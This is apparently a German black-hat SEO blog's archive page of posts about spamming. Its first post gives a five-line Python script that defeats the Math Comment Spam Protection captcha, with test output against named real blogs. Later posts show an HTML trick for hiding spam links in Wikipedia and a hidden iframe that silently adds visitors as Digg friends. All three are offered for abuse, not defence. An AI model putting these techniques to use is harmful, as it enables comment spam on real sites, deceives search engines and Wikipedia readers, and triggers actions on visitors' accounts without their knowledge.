Post abgelegt unter 'Spamming'

Math Comment Spam Protection Plugin mit 5 Zeilen geknackt

Neben SpamKarma und Akismet scheint das Math Comment Spam Protection Plugin das drittbeliebteste Anti-Spam-Plugin unter den Bloggern zu sein, bei dieser Abfrage findet Google z. B. bereits 170k Ergebnisse. Dass das Math Comment Spam Protection Plugin allerdings ziemlich unbrauchbar ist (noch unbrauchbarer als billige Captchas), zeige ich euch anhand von fünf Lines of Codes:

import urllib2, re
url=raw_input("URL eingeben: ")
blogs=urllib2.urlopen(url)
zahl=re.findall('What is the sum of (\d+) .+ (\d+)\?',blogs.read())
print int(zahl[0][0])+int(zahl[0][1])

Dieses kleine Python Script findet mit Hilfe von Regex im Source Code eines Blogs die zwei Zahlen, die man für das Ergebnis von MCSP braucht, dann erfolgt eine Typwandelung von String nach Integer und danach kann man die gefundenen beiden Zahlen einfach zusammenaddieren. Der Autor macht uns Black-Hat SEOs die Arbeit noch leichter, in dem er nur Addition in seinem Plugin eingebaut hat ;-)

Die Top10 von hier habe ich mal mit diesem Script durchgetestet und komme auf eine Erfolgsrate von 70% 60%:


>>>
URL eingeben: http://blog.ulf-wendel.de/?p=44
4
>>>
URL eingeben: http://blog.ahzf.de/index.php/2007/08/08/first-impressions-of-the-chaos-communication-camp-2007/
Traceback (most recent call last):
File “F:\_sneaky\wordpress math\mathcracker.py”, line 5, in
print int(zahl[0][0])+int(zahl[0][1])
IndexError: list index out of range
>>>
URL eingeben: http://blog.foeo.net/2006/08/25/semester-break-campus/
2
>>>
URL eingeben: http://diekretzschmars.de/impressum/colophon/
11
>>>
URL eingeben: http://www.donvanone.de/donsplugins/
Traceback (most recent call last):
File “F:\_sneaky\wordpress math\mathcracker.py”, line 5, in

print int(zahl[0][0])+int(zahl[0][1])
IndexError: list index out of range
>>>
URL eingeben: http://www.dackworld.de/plugins/
11
>>>
URL eingeben: http://www.teddykrieger-blog.de/2007/06/17/meine-plugins-fuer-wordpress/
11
>>>
URL eingeben: http://blogs.bmj.com/adc-archimedes/2007/07/11/what-is-the-long-term-outcome-for-antenatally-drug-exposed-children/
4
>>>
URL eingeben: http://blog.mueschen.info/?page_id=1276
Traceback (most recent call last):
File “F:\_sneaky\wordpress math\mathcracker.py”, line 5, in

print int(zahl[0][0])+int(zahl[0][1])
IndexError: list index out of range
>>>
URL eingeben: http://www.contentschmiede.de/plugins-used/
11

Update: Ein etwas aussagekräftigerer Test findet sich hier, von 150 getesteten Blogs konnte mein 5-Zeiler 66% der Blogs knacken.

Kommentare (24) Januar 5th, 2008 at 03:11pm gsyi

Links in Wikipedia verstecken…

In Wikipedia lassen sich mittlerweile hervorragend Links verstecken:

<div style="left: -50px; position: absolute; top: -50px; font-color: transparent">[http://www.deinlink.de/]</div>

Damit sieht nur der Googlebot die Links und der Besucher wird nichts merken. Interessant bleibt, bis wann Wikipedia noch HTML-Codes unterstützt…

Kommentare (13) April 9th, 2007 at 11:25pm gsyi

Diggs URL-basierter Friend-Adder

Was Myspace Spammer mit viel Zeitaufwand schaffen, haben es die Digg-Spammer ziemlich leicht. Man muss nur auf Digg eingeloggt sein und http://digg.com/invitefrom/{username} aufrufen, danach wird der User in der URL automatisch in die Friend-List aufgenommen. Wenn man dann auch noch eine Webseite mit vielen Digg-Besuchern hat, fügt man eine Iframe ein:

<iframe src="http://digg.com/invitefrom/{username}" height="1" width="1"></iframe>

Und alles erledigt sich von selbst…

gefunden auf thegooglecache

Kommentare (0) März 31st, 2007 at 11:19am gsyi

Aktien-Spam

Mal eine andere Art zum Spammen:
http://onlinekosten.de/news/artikel/24468/0/Aktien-Spam_verursacht_B%F6rsen-Turbulenzen

Seit Samstag landen die E-Mails mit dem Absender “Deutscher Anlage Report” massenweise in den elektronischen Postfächern. Der fragwürdige Text: “Liebe Leser, hiermit erhalten Sie eine geniale externe Gratis-Analyse von Deutscher Anlage Report: Es geht wieder steil bergauf! Wir empfehlen dringendst, sich mit Artstor AG Aktien einzudecken. Tageskurs am 15.2.2007: 4 Cent (0,039). Wochenziel: 10 Cent. Monatsziel: 40 Cent.”

Kommentare (1) Februar 23rd, 2007 at 01:40pm gsyi

Roof-Advertising - Google Earth Werbung

Eine neue Form des Online-Marketings heißt Roof-Advertising, dabei werden Botschaften auf gut sichtbaren Dächern oder anderen Flächen platziert, damit die Mitteilungen auch in Google Earth sichtbar sind. Die erste bekannte RoofAds-Kampagne hat SwiftCity vor einigen Tagen in Sydney gestartet, nachdem Google neue und hochauflösendere Karten von Australien angekündigt hat. Aus SwiftCitys RoofAds-Kampagne könnte natürlich noch ein Linkbait werden.

Interessant auch, dass bereits Agenturen gibt, die Roof Ads anbieten…

Kommentare (0) Februar 3rd, 2007 at 06:37pm gsyi

SEO Parasitic Hosting - .gov domain bei eBay

Interessante Auktion bei eBay: SEO Parasitic Hosting - .gov domain!. Da vertickt wirklich jemand Unterseiten einer .gov-Domain ;-) Der Gewinner hat dafür GBP 5.200,00 (~7.700,00 €) ausgegeben.

The main domain has over 3 million links going into it over 80,000 of these links are from OTHER .gov sites with almost 1/4 million links also coming from .edu sites. The domain has been live for over 10 years according to the Archive.org repository.

Kommentare (5) November 30th, 2006 at 05:07pm gsyi

Myspace - Spam 2.0

Ein interessanter Beitrag auf valleywag. Ein paar Zitate:

Internet spam originated as classic, straight-up, unwelcome, in-your-face-and-inbox advertising and marketing. At its worst, it comes from “Nigerian Bankers” and swindlers peddling Viagra, and more likely than not, this early incarnation of spam–we’ll call it Spam 1.0–is lurking in your inbox right now. eUniverse, the company that essentially created MySpace, was a pioneer in this field. Headed by CEO, founder, and Chairman Brad Greenspan, eUniverse (now Intermix Media), was a multimillion-dollar marketing and entertainment company known for sites like Skilljam.com, pop-up advertising, unsolicited mass emails, spyware, and the adware behind controversial peer-to-peer file sharing network Kazaa.

Tom Anderson, the eventual face of MySpace. was originally hired as a copyeditor in DeWolfe’s marketing department at Xdrive, and accompanied DeWolfe to ResponseBase when Xdrive laid them both off.

The real genius of MySpace lies in it’s re-imagining and repackaging of spam. While most internet users expend time and energy attempting to keep it out, MySpace is spam that they actually invite in.

MySpace ist also keine geniale Viral-Marketing-Kampagne aus einem Kellerbüro, sondern eine Ernte des Spam 2.0.

Kommentare (0) September 15th, 2006 at 07:38pm gsyi

eBay spammt mit Keyword-DB

http://keyword-index.ebay.de/A-1.html
Nett von eBay…

Kommentare (7) September 14th, 2006 at 06:25pm gsyi

MSN - Strider Search Defender

Ein interessanter Report zur automatischen und systematischen Erkennung von Suchmaschinenspammern durch Non-Content Analysen:
http://research.microsoft.com/SearchDefender/

Die Idee dahinter ist einfach:
MSN startet mit einer Blacklist mit bestätigten Spam-Seiten. Diese werden auf die Backlinks analysiert und somit weitere potenzielle Spam-Seiten gesammelt. Die potenziellen Spam-Seiten werden nicht gleich in die Blacklist geschrieben, sondern nochmals durch den Strider URL Tracer analysiert, um sicherzustellen, dass hier bei auch wirklich um Spam-Seiten handeln … …

Damit könnte man zwar große Splog- und Doorwaynetzwerke aufdecken, die Gefahr, Contentseiten durch das Versagen von Strider URL Tracer abzustrafen, ist aber auch groß…

Kommentare (0) Juli 14th, 2006 at 10:55am gsyi

BBC über Suchmaschinenspam

Erstmal griff BBC auch mal das Thema Suchmaschinenspam auf:

Unlike spam e-mail, web spam tries to trick search engines into featuring websites selling products such as drugs high up on a list of search results.

The spammers exploit the way search engines work by bombarding blogs and comments pages with links to their websites.

Google prioritises websites in their search results if a particular page is linked to by other sites.

Mr Merrill said: “Spammers are highly motivated. There is a lot of money at stake.”

http://news.bbc.co.uk/2/hi/technology/5140066.stm

Kommentare (1) Juli 3rd, 2006 at 06:06pm gsyi

Previous Posts


Kalender

April 2014
M D M D F S S
« Mai    
 123456
78910111213
14151617181920
21222324252627
282930  

Monatsarchiv

letzte Posts

letzte Kommentare

populärste Posts

Posts nach Kategorien

RSS Feeds + Navigation


Übersetzen Sie zum Deutsch/GermanTranslate to EnglishΜεταφράστε στα ελληνικά/GreekVertaal aan het Nederlands/Dutch日本語に翻訳しなさい /JapaneseTraduza ao Português/PortugueseTraduca ad Italiano/Italian
Traduisez au Français/FrenchTraduzca al Español/SpanishПереведите к русскому/Russian